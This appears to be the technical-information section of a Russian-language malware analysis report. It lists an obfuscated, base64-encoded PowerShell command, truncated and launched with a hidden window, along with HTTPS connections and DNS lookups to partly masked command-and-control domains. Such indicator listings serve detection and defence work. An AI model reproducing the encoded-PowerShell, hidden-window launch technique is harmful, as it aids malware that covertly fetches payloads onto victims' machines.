Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAHcAeQBzAHEAagBpAGkAagA9ACcARgBwAG4AaQBjAGsAZQBiAHEAcQBhAGwAbgAnADsAJABIAGcAdABmAGgAagB3AHIAbQB5AC...
- 'ke####safety.com':443
- 'ab#######tradingmarketing.com':443
- 'kn####planning.com':443
- 'ex###iortec.com':443
- 'ab#######tradingmarketing.com':443
- 'kn####planning.com':443
- 'ex###iortec.com':443
- DNS ASK cp####soffers.com
- DNS ASK ke####safety.com
- DNS ASK ab#######tradingmarketing.com
- DNS ASK kn####planning.com
- DNS ASK ex###iortec.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAHcAeQBzAHEAagBpAGkAagA9ACcARgBwAG4AaQBjAGsAZQBiAHEAcQBhAGwAbgAnADsAJABIAGcAdABmAGgAagB3AHIAbQB5AC...' (со скрытым окном)